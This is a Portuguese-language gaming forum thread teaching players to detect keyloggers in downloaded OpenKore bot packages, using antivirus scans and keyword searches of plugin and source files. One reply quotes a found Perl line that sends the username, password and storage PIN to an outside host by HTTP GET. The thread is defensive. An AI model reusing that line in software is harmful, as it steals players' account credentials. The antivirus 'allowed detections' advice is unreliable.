Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

[Tutorial] como detectar keylogger's no openkore

Simpson~*
 Compartilhar

Posts Recomendados

olá todos, venho aqui mostrar a vcs como ver se um openkore tem keylogger

keylogger, pra quem nao sabe, é um script / virus / programa que serve pra enviar a sua conta e senha para o programador do script.

ou seja, serve pra te hackear

as principais formas de keylogger encontrados no openkore sao o em forma de script e o em forma de vírus

1- detectando o KL em forma de vírus

esse é bem simples:

baixe o bot,

vá no site

É necessário se cadastrar para acessar o conteúdo.

clique em "escolher arquivo". vai aparecer uma janela onde vc tem que selecionar o bot suspeito. selecione-o

clique em "send file" (talvez demore um pouco)

talvez apareça uma janela dizendo que o arquivo já foi escaneado. se for o caso, clique em "reanalyze"

quando ele acabar de analizar, podem aparecer alguns virus. os unicos 3 virus permitidos sao esses:

Trojan.Win32.Heur.Gen no antivirus ByteHero

PUA.Packed.ASPack no antivirus ClamAV

Suspicious File no antivirus eSafe

P.: pas simpso, pq esses podem e os outros nao?

R.: é por que esses sao provenientes do arquivo ragexe.exe ou poseidon.exe que talvez esteja na pasta do seu bot. mas esse é o arquivo que serve pra abrir o ragnarok normal e nao tem perigo.

se river qualquer outro virus, o bot nao é confiavel. nao use-o

2- detectando keylogger na forma se script

esse é um pouco mais demorado

primeiro baixe o bot e descompacte-o

vá na pasta plugins, clique um um arquivo qualquer com o botao direito e clique em "abrir com"

depois selecione o bloco de notas.

dentro do bloco de notas, aperte ctrl+F para aparecer a ferramenta de pesquisa do bloco de notas.

procure pelas palavras:

keylogger

username

password

se a palavra keylogger aparecer em qualquer lugar, o bot nao é confiavel

as palavras username e password podem aparecer, mas nao podem estar associadas a nenhum host externo

P.: que que é host externo tio?

R.: basicamente, é um site

os unicos sites permitidos sao algum que tenha ligaçao com a level up ou o oficial do openkore, que é

P.: como eu sei se essas palavras estao associadas a um host?

R.: eles tem que estar no mesmo "periodo" (esse nao éo nome certo, mas eu esqueci o nome)

um "periodo" é um espaço entre um abre chaves { e um fexa xaves } que estejam na mesma direçao

ex:

isso é um periodo com o host dentro

keylogger {

"scripts aleatorios"

"scripts aleatorios"

"host do infeliz aqui"

"scripts aleatorios"

"scripts aleatorios"

}

como podem ver, a linha onde está o abre chaves ({), começa na mesma direçao do fecha chaves (})

o processo citado acima deve ser feito com todos os arquivos da pasta plugins e com o arquivo "servertype.pm" (use a ferramenta de pesquisa para encontra-lo)

esses sao os 2 metodos mais comuns, mas podem existir outros

se vc nao encontrar nada nao é garantia de que o bot esteja limpo, por que podem ter inventado um novo metodo que eu nao conheço

se alguem souber de qualquer outro método posta aqui pra eu incorporar ao tutorial

Link para o comentário
Compartilhar em outros sites

Muito bom o tópico, só relembrando.

O vírus total tem um gerenciador de upload próprio, facilita muito na hora do upload com muito mais segurança.

Mais alguns complementos:

Deve-se procurar por estas palavras também:

key_strokes, keylog

Script-malicioso é um script que é colocado em "QUALQUER" parte do openkore. Ou seja, não é só no arquivo ServerType0.PM e nos plugins de Relogar. Pode-se colocar no ServerType1, 2, 3, 4, 5, 6, 7, 8, 9... da pasta Send e da pasta Recive, resumindo dentro da pasta SRC o Script-malicioso pode ser colocado em qualquer arquivo.

Link para o comentário

lembrei de outra coisa. os arquivos com script malicioso podem estar ocultos.

pra visualizar arquivos ocultos no windows xp faça assim:

va nem: painel de controle > opçoes de pasta

va na aba "modo de exibiçao"

depois marque a opçao "mostrar pastas e arquivos ocultos"

clique em "aplicar" e seja feliz

Link para o comentário

Esse método ai de deixar os arquivos ocultos quem eu vi primeiramente usando foi o araujo aquele safado deu trabalho pra mim pois eu na época eu não tava conseguindo desmascarar ele nem a pau. Ai do nada veio na minha cabeça clicar em ctrl+A ai apareceu a mensagem existe tantos arquivos ocultos. Ai o restante da historia vocês sabem né? ele tomo ban e o tópico foi fechado.

Link para o comentário

• 4 semanas atrás...

Rapaz eu fiz isso tudo o que vocês falaram e a ÚNICA coisa que encontrei foi isso.

my $response = $ua->get("

keylog=$usuario $senha $kafra");

tem algum problema? ou isso pode ser considerado normal?

Link para o comentário

Não irei postar nada pronto pois aposto que meu topico não iria durar muito tempo.

Logo iria aparecer alguem falando que tem KL e coisas do genero por isso prefiro ficar na minha.

Tenho certeza de que o simpson acha a mesma coisa!

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.